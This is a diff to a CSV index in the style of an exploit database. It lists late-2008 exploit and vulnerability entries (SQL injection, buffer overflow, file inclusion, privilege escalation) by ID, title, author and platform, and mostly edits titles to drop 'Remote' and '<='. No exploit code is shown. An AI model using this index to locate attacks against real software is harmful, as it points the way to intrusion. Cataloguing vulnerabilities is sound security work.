-7294,platforms/php/webapps/7294.pl,"Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit",2008-11-29,"CWH Underground",php,webapps,0 +7294,platforms/php/webapps/7294.pl,"Lito Lite CMS (cate.php cid) SQL Injection Exploit",2008-11-29,"CWH Underground",php,webapps,0 7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - (QuizID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7296,platforms/windows/dos/7296.txt,"Itunes 8.0.2.20/Quicktime 7.5.5 - (.mov) Multiple Off By Overflow PoC",2008-11-30,"laurent gaffié ",windows,dos,0 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - (.rdp) Buffer Overflow PoC",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0 @@ -6853,30 +6853,30 @@ id,file,description,date,author,platform,type,port 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL/fu/bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench (.EWB) Local Stack Overflow PoC",2008-11-30,Zigma,windows,dos,0 7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input variable overwrite / Auth bypass",2008-11-30,girex,php,webapps,0 -7309,platforms/windows/local/7309.pl,"Cain & Abel <= 4.9.24 - (.rdp) Stack Overflow Exploit",2008-11-30,SkD,windows,local,0 +7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - (.rdp) Stack Overflow Exploit",2008-11-30,SkD,windows,local,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-11-30,NoGe,php,webapps,0 -7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) Remote SQL Injection",2008-12-01,JIKO,php,webapps,0 +7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP Knowledgebase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 7313,platforms/linux/local/7313.sh,"Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC",2008-12-01,"Paul Szabo",linux,local,0 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0 -7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - (Auth Bypass) Remote SQL Injection",2008-12-01,t0fx,php,webapps,0 +7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - (Auth Bypass) SQL Injection",2008-12-01,t0fx,php,webapps,0 7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 - (ASPPortal.mdb) Database Disclosure Vulnreability",2008-12-01,"CWH Underground",asp,webapps,0 -7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - (viewcat.php cid) Remote SQL Injection Exploit",2008-12-01,"CWH Underground",php,webapps,0 +7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - (viewcat.php cid) SQL Injection Exploit",2008-12-01,"CWH Underground",php,webapps,0 7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - (poll.mdb/poll97.mdb) Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0 7319,platforms/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - (DD/SQL/XSS) Vulnerabilities",2008-12-02,Pouya_Server,php,webapps,0 7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook Remote Command Execution Exploit",2008-12-02,"CWH Underground",php,webapps,0 -7323,platforms/php/webapps/7323.txt,"SunByte e-Flower (id) Remote SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 +7323,platforms/php/webapps/7323.txt,"SunByte e-Flower (id) SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - (cldb.mdb) Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0 7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0 7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - (pics_pre.asp ID) Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 -7328,platforms/php/webapps/7328.pl,"Check New 4.52 - (findoffice.php search) Remote SQL Injection Exploit",2008-12-03,"CWH Underground",php,webapps,0 +7328,platforms/php/webapps/7328.pl,"Check New 4.52 - (findoffice.php search) SQL Injection Exploit",2008-12-03,"CWH Underground",php,webapps,0 7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - (.rdp) Buffer Overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 - (JPEG Parsing) Recursive Stack Overflow PoC",2008-12-03,"ilja van sprundel",multiple,dos,0 7331,platforms/php/webapps/7331.pl,"Joomla Component com_jmovies 1.1 - (id) SQL Injection Exploit",2008-12-03,StAkeR,php,webapps,0 7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0 7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS (Auth Bypass) SQL Injection",2008-12-03,b3hz4d,php,webapps,0 -7334,platforms/windows/local/7334.pl,"RadAsm <= 2.2.1.5 - (.RAP) WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0 +7334,platforms/windows/local/7334.pl,"RadAsm 2.2.1.5 - (.RAP) WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0 7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion",2008-12-03,NoGe,php,webapps,0 7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion Vulnerabilities",2008-12-04,cOndemned,php,webapps,0 7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - (SQL/DD) Multiple Vulnerabilities",2008-12-04,"CWH Underground",php,webapps,0 @@ -6886,29 +6886,29 @@ id,file,description,date,author,platform,type,port 7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion",2008-12-04,NoGe,php,webapps,0 7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 - (index.php action) Local File Inclusion",2008-12-04,cOndemned,php,webapps,0 7343,platforms/php/webapps/7343.txt,"Joomla Component mydyngallery 1.4.2 - (directory) SQL Injection",2008-12-04,"Khashayar Fereidani",php,webapps,0 -7344,platforms/php/webapps/7344.txt,"Gravity GTD <= 0.4.5 - (rpc.php objectname) LFI/RCE",2008-12-04,dun,php,webapps,0 -7345,platforms/php/webapps/7345.txt,"BNCwi <= 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps,0 +7344,platforms/php/webapps/7344.txt,"Gravity GTD 0.4.5 - (rpc.php objectname) LFI/RCE",2008-12-04,dun,php,webapps,0 +7345,platforms/php/webapps/7345.txt,"BNCwi 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps,0 7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 - (id) SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0 -7347,platforms/windows/local/7347.pl,"PEiD <= 0.92 Malformed PE File Universal Buffer Overflow Exploit",2008-12-05,SkD,windows,local,0 +7347,platforms/windows/local/7347.pl,"PEiD 0.92 Malformed PE File Universal Buffer Overflow Exploit",2008-12-05,SkD,windows,local,0 7348,platforms/asp/webapps/7348.txt,"merlix educate servert - (bypass/DD) Multiple Vulnerabilities",2008-12-05,ZoRLu,asp,webapps,0 -7349,platforms/asp/webapps/7349.txt,"RankEm (rankup.asp siteID) Remote SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 -7350,platforms/asp/webapps/7350.txt,"RankEm (auth bypass) Remote SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 +7349,platforms/asp/webapps/7349.txt,"RankEm (rankup.asp siteID) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 +7350,platforms/asp/webapps/7350.txt,"RankEm (auth bypass) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - (XSS/DD) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,php,webapps,0 7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - (DD/Bypass) Multiple Remote Vulnerabilities",2008-12-05,ZoRLu,php,webapps,0 7353,platforms/asp/webapps/7353.txt,"Cold BBS (cforum.mdb) Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0 7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 Insecure Upload",2008-12-05,ahmadbady,php,webapps,0 7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - SITE Parameters Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0 7356,platforms/asp/webapps/7356.txt,"asp autodealer - (SQL/DD) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 -7357,platforms/asp/webapps/7357.txt,"ASP PORTAL Multiple Remote SQL Injection Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 +7357,platforms/asp/webapps/7357.txt,"ASP PORTAL Multiple SQL Injection Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX (VSPDFEditorX.ocx) Insecure Method",2008-12-05,"Marco Torti",windows,dos,0 7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 7361,platforms/asp/webapps/7361.txt,"ASP PORTAL (xportal.mdb) Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - Local .CCT File Stack BoF PoC",2008-12-06,Cnaph,windows,dos,0 -7363,platforms/php/webapps/7363.txt,"phpPgAdmin <= 4.2.1 - (_language) Local File Inclusion",2008-12-06,dun,php,webapps,0 +7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - (_language) Local File Inclusion",2008-12-06,dun,php,webapps,0 7364,platforms/php/webapps/7364.php,"IPNPro3 <= 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 -7365,platforms/php/webapps/7365.php,"DL PayCart <= 1.34 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 -7366,platforms/php/webapps/7366.php,"Bonza Cart <= 1.10 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 +7365,platforms/php/webapps/7365.php,"DL PayCart 1.34 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 +7366,platforms/php/webapps/7366.php,"Bonza Cart 1.10 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7367,platforms/php/webapps/7367.php,"PayPal eStore Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0 7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload & LFI Exploit",2008-12-07,DNX,php,webapps,0 @@ -6928,16 +6928,16 @@ id,file,description,date,author,platform,type,port 7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site File Upload",2008-12-08,"Michael Brooks",php,webapps,0 7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - (CSRF) Change Administrative Password Exploit",2008-12-08,"Michael Brooks",windows,remote,0 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0 -7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit",2008-12-08,StAkeR,php,webapps,0 +7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board 4) Remote Blind SQL Injection Exploit",2008-12-08,StAkeR,php,webapps,0 7387,platforms/windows/dos/7387.py,"Neostrada Livebox Router Remote Network Down PoC Exploit",2008-12-08,0in,windows,dos,0 -7388,platforms/php/webapps/7388.txt,"webcaf <= 1.4 - (LFI/RCE) Multiple Vulnerabilities",2008-12-08,dun,php,webapps,0 +7388,platforms/php/webapps/7388.txt,"webcaf 1.4 - (LFI/RCE) Multiple Vulnerabilities",2008-12-08,dun,php,webapps,0 7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 - (CSRF) Cross-Site Reference Forgery Exploit",2008-12-08,"Michael Brooks",hardware,remote,0 7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - (Auth Bypass) SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 -7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - (Auth Bypass) Remote SQL Injection",2008-12-09,AlpHaNiX,asp,webapps,0 +7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - (Auth Bypass) SQL Injection",2008-12-09,AlpHaNiX,asp,webapps,0 7392,platforms/php/webapps/7392.txt,"phpmygallery 1.0beta2 - (RFI/LFI) Multiple Vulnerabilities",2008-12-09,ZoRLu,php,webapps,0 7393,platforms/linux/local/7393.txt,"PHP safe_mode bypass via proc_open() and custom environment",2008-12-09,gat3way,linux,local,0 7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - (index.php rubid) SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0 -7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple Remote SQL Injection Vulnerabilities",2008-12-09,SuB-ZeRo,php,webapps,0 +7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injection Vulnerabilities",2008-12-09,SuB-ZeRo,php,webapps,0 7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - (Auth Bypass) SQL Injection",2008-12-09,Osirys,php,webapps,0 7398,platforms/asp/webapps/7398.txt,"postecards - (SQL/DD) Multiple Vulnerabilities",2008-12-09,AlpHaNiX,asp,webapps,0 7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - (common-tpl-vars.php) LFI/RFI Vulnerabilities",2008-12-09,CoBRa_21,php,webapps,0 @@ -6946,7 +6946,7 @@ id,file,description,date,author,platform,type,port 7402,platforms/windows/remote/7402.html,"EasyMail ActiveX (emmailstore.dll 6.5.0.3) Buffer Overflow Exploit",2008-12-09,e.wiZz!,windows,remote,0 7403,platforms/windows/remote/7403.txt,"Microsoft Internet Explorer - XML Parsing Remote Buffer Overflow Exploit (0Day)",2008-12-10,"Guido Landi",windows,remote,0 7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution",2008-12-10,ZeN,cgi,webapps,0 -7405,platforms/linux/dos/7405.c,"Linux Kernel <= 2.6.27.8 - ATMSVC Local Denial of Service Exploit",2008-12-10,"Jon Oberheide",linux,dos,0 +7405,platforms/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service Exploit",2008-12-10,"Jon Oberheide",linux,dos,0 7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation Exploit",2008-12-10,s4avrd0w,php,webapps,0 7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace (member.php u) SQL Injection",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"living Local 1.1 - (XSS/rfu) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 @@ -6954,7 +6954,7 @@ id,file,description,date,author,platform,type,port 7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (Vista) (0Day)",2008-12-10,muts,windows,remote,0 7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 - (view.php id) SQL Injection",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - (SQL/DD) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 -7413,platforms/asp/webapps/7413.pl,"CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit",2008-12-10,AlpHaNiX,asp,webapps,0 +7413,platforms/asp/webapps/7413.pl,"CF_Calendar (calendarevent.cfm) SQL Injection Exploit",2008-12-10,AlpHaNiX,asp,webapps,0 7414,platforms/asp/webapps/7414.txt,"CF_Auction (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7415,platforms/asp/webapps/7415.txt,"CFMBLOG (index.cfm categorynbr) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7416,platforms/asp/webapps/7416.txt,"CF_Forum Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 @@ -6971,10 +6971,10 @@ id,file,description,date,author,platform,type,port 7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps,0 7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps,0 7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - (index.asp cha) SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0 -7430,platforms/php/webapps/7430.txt,"SUMON <= 0.7.0 - (chg.php host) Command Execution",2008-12-12,dun,php,webapps,0 +7430,platforms/php/webapps/7430.txt,"SUMON 0.7.0 - (chg.php host) Command Execution",2008-12-12,dun,php,webapps,0 7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic ActiveX Controls mscomct2.ocx Buffer Overflow PoC",2008-12-12,"Jerome Athias",windows,dos,0 7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - (home.html menu) Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0 -7433,platforms/php/webapps/7433.txt,"Social Groupie (group_index.php id) Remote SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 +7433,platforms/php/webapps/7433.txt,"Social Groupie (group_index.php id) SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0 7435,platforms/php/webapps/7435.txt,"Social Groupie (create_album.php) Remote File Upload",2008-12-12,InjEctOr5,php,webapps,0 7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - (SQL/dd) Multiple Vulnerabilities",2008-12-12,Pouya_Server,asp,webapps,0 @@ -6993,8 +6993,8 @@ id,file,description,date,author,platform,type,port 7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum (CAForum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 7451,platforms/php/webapps/7451.txt,"php weather 2.2.2 - (LFI/XSS) Multiple Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0 -7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BoF Exploit",2008-12-14,SkD,windows,remote,69 -7453,platforms/php/webapps/7453.txt,"FLDS 1.2a (redir.php id) Remote SQL Injection",2008-12-14,nuclear,php,webapps,0 +7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 Univ. Remote BoF Exploit",2008-12-14,SkD,windows,remote,69 +7453,platforms/php/webapps/7453.txt,"FLDS 1.2a (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local DoS Exploit",2008-12-14,Adurit-T,linux,dos,0 7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - (download.php) Remote",2008-12-14,x0r,php,webapps,0 7456,platforms/php/webapps/7456.txt,"Availscript Article Script Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 @@ -7015,22 +7015,22 @@ id,file,description,date,author,platform,type,port 7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - (CAArticles.mdb) Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite (CARateMySite.mdb) Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7473,platforms/php/webapps/7473.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation Exploit",2008-12-15,s4avrd0w,php,webapps,0 -7474,platforms/php/webapps/7474.txt,"FLDS 1.2a (lpro.php id) Remote SQL Injection",2008-12-15,nuclear,php,webapps,0 +7474,platforms/php/webapps/7474.txt,"FLDS 1.2a (lpro.php id) SQL Injection",2008-12-15,nuclear,php,webapps,0 7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - (username) CSRF/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 -7476,platforms/php/webapps/7476.txt,"Mediatheka <= 4.2 - Remote Blind SQL Injection Exploit",2008-12-15,StAkeR,php,webapps,0 +7476,platforms/php/webapps/7476.txt,"Mediatheka 4.2 - Remote Blind SQL Injection Exploit",2008-12-15,StAkeR,php,webapps,0 7477,platforms/windows/remote/7477.html,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)",2008-12-15,krafty,windows,remote,0 7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 - (Auth Bypass) SQL Injection",2008-12-15,x0r,php,webapps,0 7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents (print.php id) SQL Injection",2008-12-15,nétRoot,php,webapps,0 -7480,platforms/php/webapps/7480.txt,"CadeNix (cid) Remote SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0 +7480,platforms/php/webapps/7480.txt,"CadeNix (cid) SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0 7481,platforms/php/webapps/7481.txt,"WorkSimple 1.2.1 - RFI / Sensitive Data Disclosure Vulnerabilities",2008-12-15,Osirys,php,webapps,0 7482,platforms/php/webapps/7482.txt,"Aperto Blog 0.1.1 - Local File Inclusion / SQL Injection Vulnerabilities",2008-12-15,NoGe,php,webapps,0 7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - (right.php title) SQL Injection",2008-12-15,ZoRLu,php,webapps,0 -7484,platforms/asp/webapps/7484.txt,"Click&BaneX Multiple Remote SQL Injection Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 +7484,platforms/asp/webapps/7484.txt,"Click&BaneX Multiple SQL Injection Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 7485,platforms/asp/webapps/7485.txt,"clickandemail - (SQL/XSS) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 7486,platforms/asp/webapps/7486.txt,"click&rank - (SQL/XSS) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 7487,platforms/php/webapps/7487.txt,"FaScript FaUpload (download.php) SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0 7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - (WWGguestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 -7489,platforms/php/webapps/7489.pl,"FLDS 1.2a report.php (linkida) Remote SQL Injection Exploit",2008-12-16,ka0x,php,webapps,0 +7489,platforms/php/webapps/7489.pl,"FLDS 1.2a report.php (linkida) SQL Injection Exploit",2008-12-16,ka0x,php,webapps,0 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection Exploit",2008-12-16,Lidloses_Auge,php,webapps,0 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0 7492,platforms/windows/local/7492.py,"Realtek Sound Manager (rtlrack.exe 1.15.0.0) - PlayList BoF Exploit",2008-12-16,shinnai,windows,local,0 @@ -7046,34 +7046,34 @@ id,file,description,date,author,platform,type,port 7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode Bypass Local",2008-12-17,"Amir Salmani",multiple,local,0 7504,platforms/php/webapps/7504.txt,"Joomla Component Tech Article 1.x - (item) SQL Injection",2008-12-17,InjEctOr5,php,webapps,0 7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX - ActiveX Remote Code Execution Exploit",2008-12-17,e.wiZz!,windows,remote,0 -7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) Remote SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0 -7507,platforms/php/webapps/7507.pl,"Lizardware CMS <= 0.6.0 - Blind SQL Injection Exploit",2008-12-17,StAkeR,php,webapps,0 +7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0 +7507,platforms/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection Exploit",2008-12-17,StAkeR,php,webapps,0 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS (QuickerSite.mdb) Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution Exploit",2008-12-18,StAkeR,php,webapps,0 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0 -7514,platforms/php/webapps/7514.txt,"I-Rater Basic (messages.php) Remote SQL Injection",2008-12-18,boom3rang,php,webapps,0 -7515,platforms/php/webapps/7515.txt,"phpclanwebsite <= 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 -7516,platforms/windows/local/7516.txt,"ESET Smart Security <= 3.0.672 - (epfw.sys) Privilege Escalation Exploit",2008-12-18,"NT Internals",windows,local,0 -7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - (id) Remote SQL Injection",2008-12-18,fuzion,php,webapps,0 +7514,platforms/php/webapps/7514.txt,"I-Rater Basic (messages.php) SQL Injection",2008-12-18,boom3rang,php,webapps,0 +7515,platforms/php/webapps/7515.txt,"phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 +7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - (epfw.sys) Privilege Escalation Exploit",2008-12-18,"NT Internals",windows,local,0 +7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - (id) SQL Injection",2008-12-18,fuzion,php,webapps,0 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0 7519,platforms/php/webapps/7519.txt,"MyPHPsite (index.php mod) Local File Inclusion",2008-12-18,Piker,php,webapps,0 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service Exploit",2008-12-19,"Jon Oberheide",multiple,dos,0 7521,platforms/windows/remote/7521.txt,"webcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,windows,remote,0 -7522,platforms/php/webapps/7522.pl,"MyPBS (index.php seasonID) Remote SQL Injection Exploit",2008-12-19,Piker,php,webapps,0 +7522,platforms/php/webapps/7522.pl,"MyPBS (index.php seasonID) SQL Injection Exploit",2008-12-19,Piker,php,webapps,0 7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - (download.php) File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7525,platforms/php/webapps/7525.txt,"Extract Website - (download.php filename) File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - XSS/Database Disclosure Vulnerabilities",2008-12-19,Osirys,php,webapps,0 7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - (source.php p) Remote File Disclosure",2008-12-19,Piker,php,webapps,0 7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Remote Shell Upload Exploit",2008-12-19,Ams,php,webapps,0 -7529,platforms/php/webapps/7529.txt,"constructr CMS <= 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0 +7529,platforms/php/webapps/7529.txt,"constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0 7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - (y) Remote Blind SQL Injection Exploit",2008-12-21,katharsis,php,webapps,0 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone Arbitrary File 